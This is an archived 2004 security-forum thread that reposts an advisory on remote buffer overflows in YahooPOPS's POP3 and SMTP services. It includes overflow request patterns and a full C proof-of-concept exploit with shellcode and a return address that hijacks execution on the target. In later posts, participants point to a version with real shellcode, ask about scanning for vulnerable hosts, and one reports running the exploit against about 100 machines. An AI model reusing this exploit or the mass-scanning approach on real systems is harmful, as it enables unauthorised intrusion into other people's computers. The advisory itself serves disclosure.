hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Black_hat
Sep 28 2004, 11:01 AM
well, THi is orginal Advisory about yahoopops and XP exploit , http://www.securitytracker.com/alerts/2004/Sep/1011426.html
Black_Hat
QUOTE

Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004

Product: YahooPOPS!
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows
Release Date: 27 September 2004

Vendor Status:
Informed on 24 September 2004
Response: no response
Description:

YahooPOPs! Is an application that provides POP3 access to Yahoo! Mail. It is
available on the Windows, Linux, Solaris and Mac platforms. This application
emulates a POP3 & SMTP server. It also enables popular email clients like
Outlook, Netscape, Eudora, Mozilla, etc., to download email from Yahoo!
accounts. The Latest version of this Program is 0.6 and released in 23 May 2004
until now over 120000 users download this program.

Both POP3 and SMTP services have buffer overflow vulnerabilities. The Remote
Attacker can send specific Request to these services to cause a Stack based
buffer overflow which could allow a remote attacker to execute arbitrary code
or just simply crash the service on a vulnerable system.

Details:

A YahooPOPS 0.x has the Local SMTP and POP3 engines to send and receive emails.
SMTP service Dose not Enable By default. Users can enable SMTP by Software
Options.

A POP3 USER request with more than 180 bytes will start to corrupt the heap.
POP3 request (Dos Attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready
[USER][180xA][BBBB]

As a result EAX and ECX will be overwritten.

SMTP request:
Sending a request with more than 504 bytes will overwrite ESP and cause a stack
based overflow.


Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
[504xA] [BBBB]

As a result The EIP registers will be overwritten.


Proof of concept demo exploit for YPOP! SMTP listener:

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";


/*- harmless code (tnx to snooq) , will open  notepad on the remote machine */
char code[]= "\x33\xc0" // xor eax, eax  slight modification to move esp up
"\xb0\xf0"  // mov al, 0f0h
"\x2b\xe0"  // sub esp,eax
"\x83\xE4\xF0" // and esp, 0FFFFFFF0h
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
"\xff\xd0"; // call eax



  WSADATA wsaData;


  struct hostent *hp;
  struct sockaddr_in sockin;
  char buf[300], *check;
  int sockfd, bytes;
  int plen,i;
  char *hostname;
  unsigned short port;

  if (argc <= 1)
  {
  printf("YPOPs! SMTP Overflow\n");
  printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");

      exit(0);
  }

  printf("YPOPs! SMTP Overflow\n");
  printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

  hostname = argv[1];
  if (argv[2]) port = atoi(argv[2]);
  else port = atoi("25");



  if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
  {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
  }


  hp = gethostbyname(hostname);
  if (hp == NULL)
  {
      printf("ERROR: Uknown host %s\n", hostname);
  printf("%s",hostname);
      exit(-1);
  }

  sockin.sin_family = hp->h_addrtype;
  sockin.sin_port = htons(port);
  sockin.sin_addr = *((struct in_addr *)hp->h_addr);

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
  {
      printf("ERROR: Socket Error\n");
      exit(-1);
  }

  if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
  {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
  }

  printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);


  if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
  {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
  }

  /* wait for SMTP service welcome*/
  buf[bytes] = '\0';
  check = strstr(buf, "220");
  if (check == NULL)
  {
      printf("ERROR: NO  response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
  }

plen=504-sizeof(code);
  memset(overflow,0,sizeof(overflow));

  for (i=0; i<plen;i++){strcat(overflow,"\x90");}

  strcat(overflow,code);
  strcat(overflow,ret_code);
  strcat(overflow,jump_back);
  strcat(overflow,"\n");

  if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
  {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
  }

  printf("Exploit Sent.\n");

  closesocket(sockfd);
  WSACleanup();
  return 0;
}

--------------------------------------------------------------------------

Vendor response: no response

Credits:

This vulnerability has been discovered by Nima Majidi
(nima_majidi@hat-squad.com)

The Original advisory could be found at:

http://www.hat-squad.com/en/000075.html
TheOther
Sep 28 2004, 05:00 PM
Lets open notepad everywhere. Yihaa! bang, bang!
ivan288
Sep 28 2004, 07:01 PM
there is also a version with shellcode -->http://www.governmentsecurity.org/forum/http://www.governmentsecurity.org/forum/index.php?showtopic=11518
Black_hat
Oct 2 2004, 12:00 AM
hi,
heh, just copy past shellcode wink.gif This is not hard smile.gif)!
----
Black_HAt
arn0ld
Oct 2 2004, 12:10 AM
does it work on a specific port ? i mean can we scan for that vuln? =)
Black_hat
Oct 2 2004, 12:26 AM
why not !? you can change The port with software option (YahooPOPS!) Defualt: 25 u can change to 80 26 ,... !

And i think this is not important Security Hole ! THIS is not public !
Some many pepole don't enable the SMTP service smile.gif
But u can try to find the open target !
Black_Hat
Gotisch
Oct 2 2004, 12:27 AM
QUOTE
Telnet localhost  25
220 YahooPOPs! Simple Mail Transfer Service Ready


ph34r.gif ph34r.gif ph34r.gif

the ninjas are gonna kill you if you dont read the posts properly!


-//aye

i was to late :/
arn0ld
Oct 2 2004, 12:38 AM
ouch sorry
was confused saw this a couple of times with different ports

//edit

[*] data sent 861 bytes .
[-] failed :<

tryied like a 100 boxes huh.gif
Black_hat
Oct 2 2004, 12:46 AM
blink.gif

QUOTE
the ninjas are gonna kill you if you dont read the posts properly!


What !? This is just the Example ! u can download and run the yahoopops software !

now i should say the ninjas are gonna kill you if you dont see YahooPOPS Option smile.gif)

Black_Hat
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.